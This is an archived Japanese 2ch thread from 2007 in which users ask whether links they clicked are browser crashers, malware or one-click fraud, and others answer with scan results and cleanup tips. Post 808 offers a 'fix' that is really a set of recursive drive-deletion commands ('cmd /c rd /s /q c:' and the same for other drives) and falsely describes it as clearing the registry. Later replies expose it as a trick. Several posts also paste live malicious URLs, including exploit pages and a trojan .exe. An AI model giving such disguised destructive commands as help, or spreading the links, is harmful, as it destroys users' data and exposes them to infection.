686名無しさん@お腹いっぱい。:2007/07/30(月) 20:56:09
>>685
レスありがとうございます
そのとおりやってみます
687名無しさん@お腹いっぱい。:2007/07/31(火) 23:03:34
>>561のヤツは、ダークロリータと似た感じだよな。
688名無しさん@お腹いっぱい。:2007/08/02(木) 23:41:59
ttp://www2.strangeworld.org/uedakana/
これ踏んじゃった・・・
ノートン大先生に助けてもらった。
689名無しさん@お腹いっぱい。:2007/08/03(金) 11:35:38
tp://atk.jp/dskm
やばいですか?
690名無しさん@お腹いっぱい。:2007/08/03(金) 13:31:50
>>689
やばいです
ストレンジワールドに飛ばされます
691名無しさん@お腹いっぱい。:2007/08/03(金) 14:09:52
ありがとうございました。
692名無しさん@お腹いっぱい。:2007/08/05(日) 07:02:41
693名無しさん@お腹いっぱい。:2007/08/05(日) 15:57:45
>>692
>>684-685辺りと大体同じ
694名無しさん@お腹いっぱい。:2007/08/11(土) 15:36:42
695名無しさん@お腹いっぱい。:2007/08/11(土) 21:22:43
http://www.tooree.com/02/
お願いします
696名無しさん@お腹いっぱい。:2007/08/11(土) 22:24:10
tp://up.uppple.com/src/up5288.jpg
って張ろうと思ったら2個上の人と被りんこ
詳細求む
697名無しさん@お腹いっぱい。:2007/08/11(土) 23:11:25
>694
>696
ウイルス感染無し。
ブラクラ。
698名無しさん@お腹いっぱい。:2007/08/11(土) 23:16:24
>>697
ありがとうございました
699名無しさん@お腹いっぱい。:2007/08/11(土) 23:16:55
>>695
(株)トーリージャパン って所が扱っている不動産物件情報ページ

で、なぜかSCOでワンクリ・スパム元に指定されてる
事業内容とやらにレンタルサーバーがあるからそれ経由なのか
それとも元々あやしい会社なのかはわからん

今の所PCに害は無い
700名無しさん@お腹いっぱい。:2007/08/11(土) 23:56:04
>>697
d
701名無しさん@お腹いっぱい。:2007/08/12(日) 00:38:42
>>4
こうゆうのはjaneDoeだと安心して踏んじゃう
702名無しさん@お腹いっぱい。:2007/08/12(日) 03:30:23
このスレのURLをNGWORDに追加すればある程度は防げるよ。
703名無しさん@お腹いっぱい。:2007/08/12(日) 06:36:46
>>699
ありがとうございました
704名無しさん@お腹いっぱい。:2007/08/13(月) 20:39:16
http://www.crazyclits.com/?cgi-bin/tm3/1d4f97.jpg


janeでこれ踏んじゃったんですけど
当方ウイルスバスター2007最新版で
赤い危険ですメッセがイパーイでてきてあわててウインド落としたんですが・・・
大丈夫でしょうか?
705名無しさん@お腹いっぱい。:2007/08/13(月) 20:44:45
>>704
アウツです

直ぐにPC再インスコして下さい
706名無しさん@お腹いっぱい。:2007/08/13(月) 20:54:59
>>704
ウィルス: Exploit.Win32.IMG-WMF.v

Web コンテンツのロード中にウイルスが検出されました。

アドレス: search-buy.info


ウィルス: Trojan-Downloader.JS.gen

Web コンテンツのロード中にウイルスが検出されました。

アドレス: 2005-search.com
707704:2007/08/13(月) 21:35:31
今ウイルス検索中です…
708704:2007/08/13(月) 22:26:37
とりあえずウイルス検索した限り異常はでませんでした・・
709名無しさん@お腹いっぱい。:2007/08/13(月) 23:45:17
ウイルスサイト付きのエロサイト
?以降の文字列は引っ掛け。サイトトップページを踏んだのとほぼ同じ結果になる

踏む前にWindowsUpdate完了していれば問題無い
再度スキャンして何も出なかったのなら心配無いかと
710名無しさん@お腹いっぱい。:2007/08/14(火) 04:09:59
Janeで画像リンクを踏んだ場合、それが画像で無ければ開けないハズなんだが
つまり、ビューアで云々メッセージが出るだけ
711名無しさん@お腹いっぱい。:2007/08/14(火) 09:17:27
>>704
おれはそれをjaneで踏んであとでavastでスキャンしたら見つかった
712名無しさん@お腹いっぱい。:2007/08/14(火) 09:50:41
>>704
おれはそれをIEで踏んだあとで1個ずつサイトを開いた
713- 株価【31】 :2007/08/14(火) 09:51:02
714名無しさん@お腹いっぱい。:2007/08/14(火) 23:50:24
http://zero.bestmanage3.org/framecj.php?aff_id=5024#movies/part2.mpg

これなに?
変なもの入れられたんじゃないかと心配だ
一応復元ポイント使って復元したが
715名無しさん@お腹いっぱい。:2007/08/15(水) 11:17:00
>>714
かなりの数のウイルスサイトを呼び出す
まあどれも既知の脆弱性を利用するものなので踏む前に
WindowsUpdate済ませてあるなら問題無いだろう

復元作業までしたのなら大丈夫だと思うが心配なら適当なウイルスチェック
何も出なければ完了
716名無しさん@お腹いっぱい。:2007/08/16(木) 00:22:57
tp://www.flipcjip.net/FFXI/

FF11というゲームの情報サイトとしてスパムされていたURLです
サーバが中国にあるらしく、中国人業者がPCにインストールしてある
FF11のログインパスワード等を抜き取るために造った罠サイトではないか、
と言われてるみたいなのです
ゲームがインストールされていないネット閲覧用の別PCで踏んでしまいましたが
ページが真っ白になっていたので罠にひっかかったかと思って即閉じてしまいました
(WindowsUpdateとセキュリティソフトは最新にしてあります)


ソースチェッカーオンラインでURLのソースを調べてみましたが
悪質なコードが含まれているかどうかよくわかりませんでした
ttp://so.7walker.net/index.php?site=http%3A%2F%2Fwww.flipcjip.net%2FFFXI%2F&hua=
何か危険なにおいのある点がありましたらご教授ください。
717名無しさん@お腹いっぱい。:2007/08/16(木) 01:27:11
>>716
2004年12月に修正されたセキュリティホールを利用して、ウイルスを実行するページです。
一部のIEコンポーネントブラウザで感染報告がありますが、その他のブラウザでは感染しないので無害です。
718名無しさん@お腹いっぱい。:2007/08/16(木) 02:09:57
>>717
なるほど、日ごろからWindowsUpdateをしていれば大丈夫そうですね、
念のためウィルススキャンもしてみます〜ありがとうございました。
719名無しさん@お腹いっぱい。:2007/08/17(金) 05:32:28
>201
下やばいな・・・
Spybot - Search & Destroyがブロックしてくれて助かった。
720名無しさん@お腹いっぱい。:2007/08/19(日) 11:14:10
ttp://mayhem.net/juke/bodiesbeat1.html 

専ブラで踏んでしまいました。
踏んだあとは、何も操作できなくなったので、再起動させすぐにキャッシュは削除しました。
アンチウイルスは反応しなかったのですが心配です。
721名無しさん@お腹いっぱい。:2007/08/19(日) 13:49:53
>>720
スクリプトでウィンドウのサイズや位置を変更し、映像と音声はflashだけ。
びっくり系かジョーク系か判らんけど、ウイルスは無いよ。
722名無しさん@お腹いっぱい。:2007/08/21(火) 17:28:49
ttp://www.nya-taloda.jpn.org/2MB/src/mamitasu10627.jpg

JaneでURLにカーソル合わせると普通のテレビ番組のキャプチャー画像に見えたので
クリックしたらゾンビか何かのグロ画像でした。
自分の他に踏んだ人が2chのお気に入りが消えたと言っていたので、
確認をお願いできないでしょうか?
723名無しさん@お腹いっぱい。:2007/08/21(火) 18:57:35
普通のびっくりgifでPCに悪影響のある要素は見当たらない
724名無しさん@お腹いっぱい。:2007/08/21(火) 18:59:12
初歩的なこと聞くけどブラクラってウィルスのことだよね?
725名無しさん@お腹いっぱい。:2007/08/21(火) 19:46:23
一般的に言うブラクラはブラウザをたくさん開いたりして
PC動作を重たくする・ハングアップを狙うとか、そういうものを指す

ウイルスと違って基本的に感染活動をしない
726名無しさん@お腹いっぱい。:2007/08/23(木) 15:08:19
ブラウザ・クラッシャーの略だろ。
ソフトをインストールさせようとしてくるがな。
それに入ってる恐れあり
727名無しさん@お腹いっぱい。:2007/08/23(木) 16:17:10
http://imepita.zz.tc/020070817
これを踏んでしまいました・・・・
トロイとも言われましたどなたか詳しく教えてもらえないでしょうか
728名無しさん@お腹いっぱい。:2007/08/23(木) 16:26:37
>>727
ストレンジワールドに飛ばされるようです。
対策はストレンジワールドでぐぐればでてくるよ。
729名無しさん@お腹いっぱい。:2007/08/23(木) 16:30:42
>>728
回答ありがとうございます。
一応踏んだ瞬間、対策ソフトが検出してキャッシュも消しておいたのですが。
それだけで後は問題ないのでしょうか?
730名無しさん@お腹いっぱい。:2007/08/23(木) 19:39:11
これ踏んじゃいましたwww.yahii.com.br/
731名無しさん@お腹いっぱい。:2007/08/24(金) 07:23:21
>>729
ストレンジワールドで使われているスクリプトは
一部アンチウイルスが検出するが感染活動は行わない
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_SUAR.A

踏んで脱出できたのなら、後遺症を残すものでも無いので特に問題無い

>>730
ブラジル語で何書いてあるがわからないが、トップページまでは問題なかった
732729:2007/08/24(金) 16:00:37
>>731
ありがとうございました。
733名無しさん@お腹いっぱい。:2007/08/24(金) 19:05:15
こちら踏んだら404だったんですが不安です
これは害無しと見ていいんでしょうか?
tp://85.255.114.166/1/rdgCA2404.exe
734名無しさん@お腹いっぱい。:2007/08/24(金) 20:23:15
>>733
問題ナッシング
735名無しさん@お腹いっぱい。:2007/08/24(金) 20:30:50
>>734
ありがd
736名無しさん@お腹いっぱい。:2007/08/24(金) 22:51:11
ttp://nekomimi.ws/~ro/img/1021.jpg
偽装jpgらしいのですが?お願いします。
737名無しさん@お腹いっぱい。:2007/08/25(土) 08:31:28
>>650
トロイ
738名無しさん@お腹いっぱい。:2007/08/25(土) 08:37:27
>>736
実体はhtmlで画像では無い
「ハッキングしますた」という感じのいたずら・ジョークページかな
一応常にアクティブウィンドウになる仕掛けがしてあるので
何も知らないで踏むと、変なの仕掛けられたと思うかもしれない
軽いブラクラといった所

対処法はそのまま閉じるか別のページに飛べばいい
特にシステム感染などは行わないので事後処置も必要無い
739名無しさん@お腹いっぱい。:2007/08/26(日) 00:21:23
ここ踏んだらポップアップのブロックがとまらなくなったのですが、
ポップアップを外すと何が出るか怖くて見れません
このサイトを踏んだ場合、ウイルスとかでるでしょうか?
URLからして有名そうな気がするですが

357 名前: 就職戦線異状名無しさん 投稿日: 2007/08/26(日) 00:09:04
http://www2.strangeworld.org/uedakana/

「週間ダイヤモンド」の2006年9月16日号に掲載されている100職種推定年収ランキング
740名無しさん@お腹いっぱい。:2007/08/26(日) 03:47:19
741名無しさん@お腹いっぱい。:2007/08/26(日) 15:02:50
>>739
とりあえずこのスレを>>258あたりから嫁
742 【bicycle:0】 :2007/08/26(日) 17:08:25
743名無しさん@お腹いっぱい。:2007/08/26(日) 22:41:15
テキスト文書でできる
ブラクらの作り方
教えて下さい
744名無しさん@お腹いっぱい。:2007/08/27(月) 10:03:41
tp://hey.chu.jp/up/source3/No_5970.png

多分なんかの画像だと思うけど
解らないてかjaneが固まってしまう
745名無しさん@お腹いっぱい。:2007/08/27(月) 10:25:32
>>744
9524×10000の画像
746744:2007/08/27(月) 11:02:51
>>745
有り難うございます
安心できました
747名無しさん@お腹いっぱい。:2007/08/27(月) 11:24:42
744の画像結構前からたびたび貼られているけど
janeに仕様変更でもあったの?

最近になって、jane固まるって騒がれているの見かけるようになったもんで
748名無しさん@お腹いっぱい。:2007/08/27(月) 13:29:08
メモリ喰いまくってハングアップするだけ
749名無しさん@お腹いっぱい。:2007/08/27(月) 19:23:57
じゃ特に何か変わったわけでも無いのか
了解
750ν:2007/08/28(火) 08:27:39
ν
751名無しさん@お腹いっぱい。:2007/08/28(火) 14:35:35
ttp://up.uppple.com/src/up5288.jpg
グロ画像が出た後胡散臭いサイトに飛ばされ
色々されました。トロイ出たので削除して、
OEで自分のメールアカウント以外の変なのができたので
自分が使うメールのやつ以外全て消しました。
Realの履歴も精神衛生上よろしくないので抹消しました。
なんかダウンロードされたのとTelnet起動が気になります
光回線なのでQ2とかの変なダイヤルアップはされてないと思われますので
以上の処置でいいのでしょうか。
752名無しさん@お腹いっぱい。:2007/08/28(火) 15:08:14
>>751
中身は大体>>561あたりと同じ
各種ブラクラ及び>>3のサイトの呼び出し
あと複数のウイルスサイトの呼び出しがある

事前にWindowsUpdateしてあれば、ほぼ感染は無い
一応適当なウイルススキャンして何も出なければ完了
753名無しさん@お腹いっぱい。:2007/08/28(火) 15:36:34
ok, ありがとうございます
AVGが感知してくれたのでよしとします。
754名無しさん@お腹いっぱい。:2007/08/28(火) 23:38:58
http://anu.s7.x-beat.com/1up/src/up11316.jpg
これを踏んでしまいました。
前にも踏んだ方が質問していますが、返答がないので再び質問させていただきます。
大丈夫でしょうか?
755754:2007/08/28(火) 23:42:27
ソースチェッカーにかけました。

※このアドレスは危険URLのひとつです。
ブラクラチェックが終了しました。

※ ジャンプタグを発見しました。(1)
※ このページは自動的にリロードされるようです。
※ フォームタグを発見しました。(1)
http://www.searchmeup.com/search.php
※ インラインフレームタグを発見しました。 (129)
http://www.otsos.ru/
http://lolworld.ecstazy.info/cjstats/index.html
http://lolitas-teens.com/
http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm
http://www.otsos.ru/cgi-bin/gc3/in.cgi?baas844&1
上記アドレスのチェックもお勧めします。(そのままチェックできます。)
※ 注意!悪意のあるコードを発見しました。
※ 注意!一部タグが大量に使われています。

↑よくわからないのですが、PCに実害はあるのでしょうか?
また、フォームデータの内容がこのアドレスに送信されると書いてあったのですが、
個人情報が漏れているのでしょうか?
756名無しさん@お腹いっぱい。:2007/08/28(火) 23:45:05
入力したものだけじゃないすかね?
757名無しさん@お腹いっぱい。:2007/08/28(火) 23:48:29
PCに実害が有るか無いかで言ったら有る方になるが

>>754
>>561と大体同じ内容
呼び出すサイトなどに多少違いがあるが
各種ブラクラや複数のウイルスサイト・ブラクラサイトを
呼び出すという構造は変わらない

従って対処法も変わらない
適当なウイルススキャンして何も出なければ完了
758名無しさん@お腹いっぱい。:2007/08/29(水) 01:28:35
27歳一流大学卒業。一流企業に就職し、同年代の他の人に比べ
給料もずっと高い。大きな仕事だって任されている。妻もいて
子供もいて家だって持っている。他人が羨むような生活を送っている。
そんな俺の唯一の趣味はインターネットの匿名掲示板『2ちゃんねる』だ。
家に帰ってパソコンを立ち上げるなり、いきなり「うんこ」と書き込む。
アツイ議論が飛び交っている有意義なスレッドに向かって
なんの脈絡も無く突然「うんこ」だ。
会社の奴らもまさか俺が「うんこ」と書きこんでいることは夢にも思うまい。
クソマジメでとおっている俺が会社で「うんこ」と発言するわけないからな。
とにかく俺はこうやって日々のストレスを発散しているのである。
「うんこ」
759名無しさん@お腹いっぱい。:2007/08/29(水) 04:32:37
>>727と同じくこれ踏んでしまいました
ttp://imepita.zz.tc/020070817

警告出たのですぐ閉じて再起動キャッシュ削除しました。
問題ないとのことですが、なぜかavastが変です。
ツールバーのアイコンに停止マークみたいのついてて、クリックすると

「AAVM サブシステムはRPCエラーを検出しました。
 処理を完了することができませんでした 
          [OK]          」

と出てきます。どうしたらいいですか^^^^^
760名無しさん@お腹いっぱい。:2007/08/29(水) 05:20:26
>>759
エラー自体は特定ソフトに起因する問題のようなので
avastスレの方がいい回答が得られるんじゃなかろうか

適当にググって出てきたページ
ttp://www.avast.com/jpn/faq-red-circle.html

これで回復しないなら当方には分かりません
761名無しさん@お腹いっぱい。:2007/08/29(水) 09:31:48
          ∧_∧  
         ( ^ω^)   シュッ
          (つ  と彡 /
          | |/   /
          (/    /
         /    /
        /      /
      / ///   / ツツー

http://erophotos.thumblogger.com/home/log/2007/32/amateur1.html
762名無しさん@お腹いっぱい。:2007/08/29(水) 10:59:57
>>760
なんか朝起きたら治ってました。
ご指摘の通りブラクラ関係なかったようです。
ありがとうございました!
763名無しさん@お腹いっぱい。:2007/08/31(金) 01:51:44
すみません!
初心者なんですが教えて下さい。
ttp://imepita.zz.tc/020070817
パソコンで開いたら、ウイルスバスターが「(このウイルスは)隔離できませんでした」と出て、危険度は3あるうちの2でした。
どう対処したら良いのでしょうか?
そして、このブラクラにはどの様な害があるのかも、教えて下さい。
ご存知の方おられましたら、どうかよろしくお願いします。
764名無しさん@お腹いっぱい。:2007/08/31(金) 02:07:58
>>763
このスレに答えはある。
765名無しさん@お腹いっぱい。:2007/08/31(金) 02:11:46
>>764
申し訳ありませんが、詳しく教えて頂けたら幸いです。
よろしくお願いします。
766名無しさん@お腹いっぱい。:2007/08/31(金) 02:16:42
>>765
1から読め
767名無しさん@お腹いっぱい。:2007/08/31(金) 02:25:41
>>766
何回もすみません。
1から読んでみますが、色々あるブラクラの中から私の開いたブラクラを探し出すコツはありますか?
皆さんはどの様に見つけているのでしょうか?
遅くなりましたが、レス有り難うございます。
768名無しさん@お腹いっぱい。:2007/08/31(金) 02:38:18
>>767
Ctrl+F
769名無しさん@お腹いっぱい。:2007/08/31(金) 02:40:45
>>767
>>768の後 ttp://imepita.zz.tc とでも入力しこのスレ内で調べて下さい
後はそこへのレスを辿っていけばおkです

なんとなく気になってttp://imepita.zz.tc/020070817をhtml保存した自分は負け組orz
770名無しさん@お腹いっぱい。:2007/08/31(金) 04:46:39
>>768
>>769
有り難うございます。やってみます。
771名無しさん@お腹いっぱい。:2007/08/31(金) 04:49:42
Ctrl+Fttp://imepita.zz.tc
これで良いのかな?
772名無しさん@お腹いっぱい。:2007/08/31(金) 17:22:23
おk^^
773名無しさん@お腹いっぱい。:2007/08/31(金) 22:01:50
>>772
どうもです(^∀^)ノ
774名無しさん@お腹いっぱい。:2007/09/01(土) 00:28:41
ttp://up.uppple.com/src/up5288.jpg
これふんじゃったんですけど
どうなるんですか?
775名無しさん@お腹いっぱい。:2007/09/01(土) 00:43:49
>>774
このスレに答えはある。
776774:2007/09/01(土) 12:32:14
>>775
ありがとうございます。
無事童貞卒業できました。ハァフゥ〜
777名無しさん@お腹いっぱい。:2007/09/06(木) 05:03:54
tp://news-club.jp/register1.php?top=view&blog=a

お手数ですがよろしくお願いします
778名無しさん@お腹いっぱい。:2007/09/06(木) 05:09:28
>>777
※このアドレスはワンクリック詐欺サイトのひとつです。

警視庁のサイト http://www.keishicho.metro.tokyo.jp/haiteku/haiteku/haiteku35.htm
779777:2007/09/06(木) 05:16:10
>778
こんな明け方にありがとうございます!
何かブラウザがDOSコマンドのような表示をしたので不安になってしまって…
安心して仕事いってきます!
780名無しさん@お腹いっぱい。:2007/09/06(木) 05:19:22
一応怪しいサイトだからクッキー・キャッシュ削除とオンラインスキャンぐらいはしといたほうがいいと思う。
781名無しさん@お腹いっぱい。:2007/09/06(木) 08:23:58
>777
同じの踏みました。
踏んで即>780をしましたが・・・
ここを見て良かったです。
>778,780
777さんではないですがありがとうございました。
782名無しさん@お腹いっぱい。:2007/09/07(金) 20:23:48
検知しました: トロイ Trojan.HTML.Agent.b URL: http://up.uppple.com/src/up5288.jpg
783名無しさん@お腹いっぱい。:2007/09/07(金) 22:14:55
直リン張るなボケ
784名無しさん@お腹いっぱい。:2007/09/08(土) 03:47:19
IEが使えなくなりました。

【使用OS】
XP
【WindowsUpdateしてるか】

【AntiVirusは何を使っているか】
ウイルスバスターは使ってません。
【ちゃんとUpdateしてるか】

【スキャンした結果(ウイルス名・発見場所)】
してません。
【別のオンラインスキャンしたならその結果は】
わかりません
【症状を具体的に、分かる限りすべて書く】
IEがタグを無限に開き始めました。
変な警告(何とかの初期化に失敗しましたみたいな)も出ました。
焦って無理やりシャットダウンしました。
もう一度起動してみたらネットに繋ぐ事も出来なくなっていました。
【何をしたらそんなことになったのか】
Vista Uploaderとかいうぅpろだで画像を開いたら上記のようになりました。
その画像は全体的に黒色の背景で女の子が写ってるものでした。
リトバスのキャラ三人が写ってる画像の隣にありました。
【これまでにとった措置】
IE7をインストールしてみましたがダメでした。
FIREFOXではちゃんと繋がりました。
【その他の質問】
かなり焦ってます。
直す方法を教えて下さい!
何が何だかわからなくて困ってます。
785784:2007/09/08(土) 03:52:25
書き忘れてました。
他のアカウントではIEは正常に繋がりました。
ブラクラ踏んだ自分のアカウントだけがダメみたいです。
どなたか直し方を教えて下さい。
786名無しさん@お腹いっぱい。:2007/09/08(土) 04:00:46
>>784
とおりあえず繋がるfirefoxでオンラインスキャンをしてみれば。
http://www.trendflexsecurity.jp/security_solutions/housecall_free_scan.php
(このサイトは削除もできるけど誤検出の場合もあるから注意)

アンチウィルスは無料もあるからとりあえずいれておいたほうがいい。
フリーのアンチウイルスソフト Part12
http://pc11.2ch.net/test/read.cgi/sec/1183271953/
787名無しさん@お腹いっぱい。:2007/09/08(土) 08:17:12
>>784
データや設定をバックアップして素直にリカバリ。
その際WindowsUpdate、アンチウィルスのインストールも忘れずに。
で、当たり前のことだがそれらの作業が完了するまでネットアクセスは控える。
788名無しさん@お腹いっぱい。:2007/09/08(土) 14:13:05
>ウイルスバスターは使ってません。

お前らここには突っ込まないの?
789名無しさん@お腹いっぱい。:2007/09/08(土) 15:13:36
突っ込んだら負けだ。と思っている。
790名無しさん@お腹いっぱい。:2007/09/08(土) 16:45:18
7. //www.albinoblacksheep.com/flash/open.html
踏んじゃったんだけど
どうしたらいいの?
特になんともありません
ただ、今オンラインスキャンしているのだが
進行状況96パーセントでスパイウェア2個検出しているようです・・・・
791名無しさん@お腹いっぱい。:2007/09/08(土) 18:10:47
>>790
スパイぐらいで騒ぐなよ。削除するかそのままにするか自分しだいだ
792784:2007/09/08(土) 19:48:45
>>786のサイトでチェックしたところ
スパイウェア Generic Grayware
セキュリティーホール MS07-004 MS07-027 MS07-033
と出てきました。
それからスパイウェアを削除して、MSUPDATEしようとしてクリックしてもIEではこのページを表示出来ませんと
出るため、別のアカウントからXP SP2用のUPDATEを3つDLしてブラクラ踏んだアカウントに移して起動させましたが
まだIEではこのページを表示出来ませんと出ます。
どうすれば良いでしょうか?
何がいけないのでしょうか?
文が変だと思いますが助けて下さい!

ウイルスバスターはマカフィーの無料が切れて、新しく何か入れようと思っていた矢先にこの様ですorz
793名無しさん@お腹いっぱい。:2007/09/08(土) 19:58:51
まずPCは家族などの共有ですか? あとこのPCで管理者権限を持っていますか?
794名無しさん@お腹いっぱい。:2007/09/08(土) 20:10:16
>>792
ここの一番下に出ているリンクからトレンドのウィルス駆除ツールを試してみて
だめならOSのクリーンインストールしたほうがいいなじゃない。
http://oshiete1.goo.ne.jp/kotaeru.php3?q=2066996
795784:2007/09/08(土) 20:12:05
このPCは家族で使ってます。
兄、自分、親と分けて使っています。
管理者権限はちょっとわかりません。
調べる方法ありますか?
796名無しさん@お腹いっぱい。:2007/09/08(土) 20:24:22
共有ならリカバリってわけにもいきませんね。
まず>>794のツールを試してみては。 ダメならXPの場合、システムの復元で感染以前の状態に戻す。
http://support.microsoft.com/kb/306084/ja
797784:2007/09/08(土) 20:57:32
システムの復元をしようとしたらrstrui.exeに問題が発生したとでて起動しません。
これもブラクラの影響ですか?
798名無しさん@お腹いっぱい。:2007/09/08(土) 21:05:48
799784:2007/09/08(土) 22:49:25
僕のアカウントだけ消してまた新しいアカウントを作っても無駄でしょうか?
復元しても復元ポイントが変な場所だったのでダメでした。
(復元ポイント Installed Windows XP KB915865)
そして復元してもIEでは表示出来ませんとまた出ます。
もう訳がわかりません。
800名無しさん@お腹いっぱい。:2007/09/08(土) 23:00:01
自分のアカウント消して新しく作るのはいいかもね。
アカウント作り終わったらアンチウィルスとアンチスパイ入れて一度検査しておいたほうがいいよ。

【無料】 フリーセキュリティ の組合せ 4
http://pc11.2ch.net/test/read.cgi/sec/1186594483/
801784:2007/09/08(土) 23:09:33
アカウントを作り直すのは、必要なデータだけ共有フォルダに入れてから消すであってますよね?
消したらまた新しく作ると。

それでもダメだったらどうしよう(;´д⊂)
802名無しさん@お腹いっぱい。:2007/09/08(土) 23:25:20
作る→データ移行→消す でいいでしょ。
心配ならアップロードに時間かかるけど↓使えばいい。(個人情報は注意)
http://www.filebank.co.jp/
803784:2007/09/09(日) 03:26:36
無事に直りました!
アカウント作り直す方法でやりました。ちゃんとIEも使えます。
これを教訓にウイルスバスターをしっかり入れときます。
皆さんありがとうございました!

ブラクラマジ無くなれ(´・ω・`)
804名無しさん@お腹いっぱい。:2007/09/09(日) 03:34:07
ウイルスバスターは止めとけ。
金出すだけ無駄だぞ。
805名無しさん@お腹いっぱい。:2007/09/09(日) 04:23:40
ワンクリ詐欺にひっかかった!!
デスクトップにずっと変なの出てる

お願いタスケテ
806名無しさん@お腹いっぱい。:2007/09/09(日) 04:29:08
ブラウザのキャッシュとクッキーを削除してからオンラインスキャン
http://www.trendflexsecurity.jp/security_solutions/housecall_free_scan.php
807名無しさん@お腹いっぱい。:2007/09/09(日) 04:30:57
>>805
リカバリー
後は何も無かったかのように忘れる
808名無しさん@お腹いっぱい。:2007/09/10(月) 00:49:27
>>805
チェックディスクコマンドを試してみ。

1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする。

上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:

これでレジストリの破損やメモリのキャッシュなどがクリアされて正常になる。
HDD内も綺麗にリフレッシュされるのでオススメ。
事前予防にもなるので、やった事がなければ試してみる価値あり。
809名無しさん@お腹いっぱい。:2007/09/10(月) 08:35:39
>>808
一つめのコマンドを実行した時点でエラーが出ます。
810名無しさん@お腹いっぱい。:2007/09/10(月) 10:25:58
>>809
ワンクリック詐欺の次は2chでまただまされるとは。
セキュリティ関連のサイトを見たほうがいいですよ。 
http://oshiete1.goo.ne.jp/qa2656130.html?ans_count_asc=2
811名無しさん@お腹いっぱい。:2007/09/10(月) 15:23:08
(・ε・)キニシナイ!!
812名無しさん@お腹いっぱい。:2007/09/10(月) 22:59:34
>>809
こっちのほうが簡単確実だお

1 スタートボタンを押し、ファイル名を指定して実行]をクリック
2regedit と入力
3HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Runと入力
4 Welcome = %System%\kernel32.exeの値を削除
5HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runと入力
6Config = %System%\kernel32.exeの値を削除
7HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesと入力
8Sevice = %System%\kernel32.exeの値を削除
9HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceと入力
10Welcome = TMP15F.EXEの値を削除
11HKEY_CURRENT_USER\Software\Microsoft\Windowsと入力
次の値を削除
o File1
o File2
o File3
o Count
o Date
o LastError
o Ver
12レジストリエディタを終了
13 コンピュータを再起動
813名無しさん@お腹いっぱい。:2007/09/11(火) 17:28:52
そのコマンドとか訴えられて逮捕された例もあるからほどほどにな
814名無しさん@お腹いっぱい。:2007/09/13(木) 12:17:03
というよりも、どうして面識のない、顔もわかんない
どこに住んでいるかも判らない、つまりはどこの馬の骨ともわからない
赤の他人の言うことをほいほい信じて実行するやつがいるのか
そっちのほうが、ウィルスに引っかかるより謎だ。
815名無しさん@お腹いっぱい。:2007/09/13(木) 17:34:39
ん?怖くなったの?w
816名無しさん@お腹いっぱい。:2007/09/13(木) 17:54:32
いや、後で泣くくらいなら自分でちゃんとしようと
考える頭がないほど、教えてくれちゃんってのは
お子様なのかなあ、と。
817名無しさん@お腹いっぱい。:2007/09/14(金) 00:20:15
とりあえず通報しておきました
818名無しさん@お腹いっぱい。:2007/09/14(金) 05:30:03
俺も通報しといた
819名無しさん@お腹いっぱい。:2007/09/14(金) 06:57:04
>>816
あほか
そういう問題じゃないだろ
820名無しさん@お腹いっぱい。:2007/09/14(金) 10:08:26
>>819
いや、そう言う問題だが。
何もしないでも自動的に発動するもの以外はな。
全部自己責任だろ、こんなもん。
821名無しさん@お腹いっぱい。:2007/09/14(金) 10:14:38
ところで、ブラクラ踏んだ後に
何か対策してる?
822名無しさん@お腹いっぱい。:2007/09/14(金) 13:20:27
>>820
訴えられるのはたとえ相手が馬鹿でもそういうのは関係ないんだよ
そんなに怖くなったのか?
823名無しさん@お腹いっぱい。:2007/09/14(金) 13:42:59
恐怖で涙目の809、812ワロスwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
824名無しさん@お腹いっぱい。:2007/09/14(金) 14:06:56
これはどうだ?イヤホン推奨
http://eva.karou.jp/
825名無しさん@お腹いっぱい。:2007/09/14(金) 14:16:12
>>820
ネットはねぇ、子供も見てるんだよねぇ
子供に危害を加えるような書き込みしちゃいけないよねぇ
全部自己責任だよねぇ^^;
826名無しさん@お腹いっぱい。:2007/09/14(金) 16:38:14
まあ、想像力の欠如はろくな結果にならないからな
子供じゃあるまいし
大人なら自己責任という言葉を自己の正当化に使うのはやめろ
827名無しさん@お腹いっぱい。:2007/09/14(金) 20:41:08
>>813
誰が逮捕されたの?
828名無しさん@お腹いっぱい。:2007/09/14(金) 21:39:24
>>821
このスレのURLをNGワードに追加。
829名無しさん@お腹いっぱい。:2007/09/15(土) 18:44:13
tp://www2.strangeworld.org/uedakana/
踏んじまったぜ
830名無しさん@お腹いっぱい。:2007/09/17(月) 22:47:27
tp://omanchin.com/railway/omanchin.cgi/img/img20070615.jpg

↑専ブラで踏んでしまったんですが・・・
831名無しさん@お腹いっぱい。:2007/09/18(火) 10:19:13
>>830
リモートホストとクリップボードの中身を抜かれる
PCそのものには実害無い
832名無しさん@お腹いっぱい。:2007/09/18(火) 19:10:29
        ── ヽ
    ノ:::::::\::::::::::::::::::::::ヽ
   /::::::::::::ノノ'''''''\::::::::::ヽ
   ノ::::::::::ノ \ /ヽ:::::ヽ パソコン壊れちゃったよ…。
   |:::::::::ノ) ヘ  ヘヽ:::| _________
   ノ::::::ノ    ( ) |::::  | |.              |
   ノ::::::ノ  / ̄\| :::|  | |                 |
   ノ:::::| \___ノ::::|  .| |                 |
   ノヾ\゙  ー‐ -イ\.  .| |                 |
 /⌒\)_\    | ゝ ヽ |_|_________|
 |    \``\ ゙ l |/ ヾ  ヽ  _,| |  |_
 .|ヽ、   〜ー‐┴ィ'⌒| ̄ ̄ ̄| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| カタカタ…
───────┴'こ|___|_:◎__[ロ:≡〕ロ.|────http://www.scancoo.com/
833830:2007/09/18(火) 20:57:57
>831
ありがとうございます。
リモートホストを抜かれると何か問題があるのでしょうか?
834名無しさん@お腹いっぱい。:2007/09/19(水) 03:31:00
>>833
ほぼ無い
リモートホスト(IP)は基本的にアクセスした相手に知らせるようになっている
830のサイトのようにわざわざ第三者に見せる事は、普段はしないというだけ

強いて言うなら会社や学校のPCから見た時くらいか
